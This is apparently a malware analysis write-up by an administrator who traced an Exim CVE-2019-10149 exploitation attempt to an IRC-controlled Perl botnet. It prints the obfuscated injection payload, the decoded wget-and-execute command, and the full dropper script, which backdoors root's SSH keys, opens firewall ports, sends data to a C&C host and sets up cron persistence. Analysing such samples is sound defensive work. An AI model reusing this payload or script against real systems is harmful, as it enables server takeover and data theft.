Contents
Malware analysis
Initial infection
It started this morning. I received a mail from my mailserver that it couldn't deliver an email. It looked like a normal email, but the recipient was what triggered me. The mailadres had some command injection. After some searching on the internet I ended up in some vulnerability in Exim versions 4.87 to 4.91 that made this possible. (CVE-2019-10149) But let's take a look at the mailadres.
<root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x2045.148.10.84\x2fss\x20-Osxs\x3bchmod\x20\x2bx\x20sxs\x3b.\x2fsxs\x22}}@gnr01.servers.sciuro.org>
I replaced the "\x" for the "%" to parse it as URL decode. Changed some characters and I ended up with the following command. We got a C&C server! 45.148.10.84
/bin/sh -c "wget 45.148.10.84/ss -Osxs;chmod +x sxs;./sxs"
Initial malware
The ss executable contains the next code:
#!/bin/bash
exists=$(grep -c "^jkl:" /etc/passwd)
if [ $exists -eq 0 ]; then
chattr -isa /root/.ssh/authorized_keys
echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCtI3JzaABDotq1IL3m3KCpwMdGCY+Jr5CGbnznw4QPvVh139jplKrTxm7/3bLdfiLXtkmZfQBiWykH1zi0boA4Tdpw2VJAP9cJL7aru3yX6Zp9Ipo8BdwHHx/KCvLeT9zXosdFCGMyrLZySvhLs3ndqcKOLnQiEAwctaMQxH6hyuRo7Ao5xHTQuYHPVLjNQcZ4as2lFmSEHciPaRda7qgOapWXJdFscwiCyfjxoXOvhRLIb9zVuyvYIc+/X3lufaBrr5G7ElnEfV9/82D9GEOfIXXmLpbSmk5jnu66AXPk4KepTzFx3orvQA7Vk84YsWQDxcyiw78nCvICk1S30YtJ root@' >/root/.ssh/authorized_keys
/usr/sbin/sshd -p 322
/sbin/iptables -I OUTPUT -p tcp --dport 322 -j ACCEPT >/dev/null 2>&1
/sbin/iptables -I INPUT -p tcp --dport 322 -j ACCEPT >/dev/null 2>&1
/sbin/iptables-save >/dev/null 2>&1
/usr/sbin/iptables -I OUTPUT -p tcp --dport 322 -j ACCEPT >/dev/null 2>&1
/usr/sbin/iptables -I INPUT -p tcp --dport 322 -j ACCEPT >/dev/null 2>&1
/usr/sbin/iptables-save >/dev/null 2>&1
data2=`netstat -natp |grep sshd|base64`
wget -q --post-data "DATA=dGlua2QK&DATA2=$data2" 45.148.10.84/.z/p.php -O /dev/null
cd /tmp
echo 'cd /tmp;wget 45.148.10.84/r.png;perl r.png;rm -fr r.png' > twink
echo 'crontab -l|grep -v twink > /tmp/mycron;crontab /tmp/mycron;rm -fr /tmp/twink' >> twink
echo '* * * * * /tmp/twink' >mycron
crontab -l >> mycron
chmod +x /tmp/twink
crontab mycron;rm -fr mycron
else
exit
fi
This script will do the following:
- Checks it the user "jkl" exists. If so, stop executing the script.
- Add a public SSH key to the root user.
- Start a SSH server listening on port 322.
- Open the firewall for incoming and outgoing connection on port 322 and save it for reboots.
Show the current listening ports for the SSH server and send them in a POST request back to the C&C server.
Download a r.png file, run it trough perl and save it as the file twink.
- Put the downloaded script in the crontab and run it every minute.
Agent
The twink executable is a Perl IRC bot. You can find the code here. It's a really old script, but it still works.
- It chooses a process name from a list and rename his own processname to hide his presence.
Do some preparations for connecting to the C&C server by IRC.
- It takes a random IRC client version name. Most of them are from the mIRC IRC client.
- It chooses a random username.
- It chooses a random realname.
- It chooses a random nickname.
- It tries to connect to the IRC server on 45.148.10.84 on port 21, 8080 or 9999
It listens for commands of the user evil with a hostmask of mfu.txt in the channel #root.
IRC C&C server
There is an IRC server on the IP 45.148.10.84. Let's connect to it and see how it's working:
[09:08:24] Connecting to [45.148.10.84] on port 8080 [09:08:24] Connection to host established [09:08:25] -irc.evilcode.php- *** Looking up your hostname... [09:08:25] -irc.evilcode.php- *** Couldn't resolve your hostname; using your IP address instead [09:08:25] Welcome to the Don`t Use This ircd IRC Network XXXXX!XXXXX@XXX.XXX.XXX.XXX [09:08:25] Your host is irc.evilcode.php, running version Unreal3.2.10.6 [09:08:25] This server was created Sat Mar 7 2020 at 10:20:59 UTC [09:08:25] irc.evilcode.php Unreal3.2.10.6 iowghraAsORTVSxNCWqBzvdHtGpI lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGjZ [09:08:25] AWAYLEN=307 CHANLIMIT=#:10 CHANNELLEN=32 CMDS=KNOCK,MAP,DCCALLOW,USERIP,STARTTLS HCN KICKLEN=307 MAXCHANNELS=10 MAXLIST=b:60,e:60,I:60 NAMESX NICKLEN=30 SAFELIST TOPICLEN=307 UHNAMES are supported by this server [09:08:25] CASEMAPPING=ascii CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTGZ CHANTYPES=# ELIST=MNUCT EXTBAN=~,qjncrRa MAXTARGETS=20 MODES=12 NETWORK=Don`t-Use-This-ircd PREFIX=(qaohv)~&@%+ SILENCE=15 WALLCHOPS WATCH=128 WATCHOPTS=A are supported by this server [09:08:25] EXCEPTS INVEX STATUSMSG=~&@%+ are supported by this server [09:08:25] There are 1 users and 9 invisible on 1 servers [09:08:25] 1 operator(s) online [09:08:25] 4 channels formed [09:08:25] I have 10 clients and 0 servers [09:08:25] Current local users 10, max 232 [09:08:25] Current global users 10, max 232 [09:08:25] Message(422): MOTD File is missing [09:08:25] XXXXX sets mode +iwx
After we are connected, we automatically joined the channel #R. There was nobody, except an OP user, named evil. He had the next whois information.
[09:12:18] evil has userhost fld@mfu.txt and real name “.” [09:12:18] evil is in @#R [09:12:18] evil is connected on irc.evilcode.php (Stay OUT BITCH!) [09:12:18] evil is a Network Administrator [09:12:18] evil is available for help. [09:12:18] evil signed on at 31 March 2020 at 19:47:43 CEST and has been idle for 13 hours, 11 minutes, 35 seconds
This confirms our findings about the C&C control user in the twink.pl script. This is the user that could give the commands to the bot. We could also join the channel #root, but that didn't changed anything. One OP user and one client user. I took some time to observe, but nothing was happening.
OSINT
Vulnerabilities
Name |
CVE |
Comment |
CVE-2019-10149 |
A flaw was found in Exim versions 4.87 to 4.91. |
IP Information
Name |
Status |
Amsterdam, North Holland, Netherlands |
Abuse sites
Shodan
Port |
Service |
Banner |
22/TCP |
SSH |
SSH-2.0-OpenSSH_5.3 |
80/TCP |
Apache 2.2.15 |
HTTP/1.1 403 Forbidden |
5432/TCP |
Unreal ircd |
|
8080/TCP |
Unreal ircd |
|
9999/TCP |
Unreal ircd |
|
Pastebin
Name |
Status |
First script |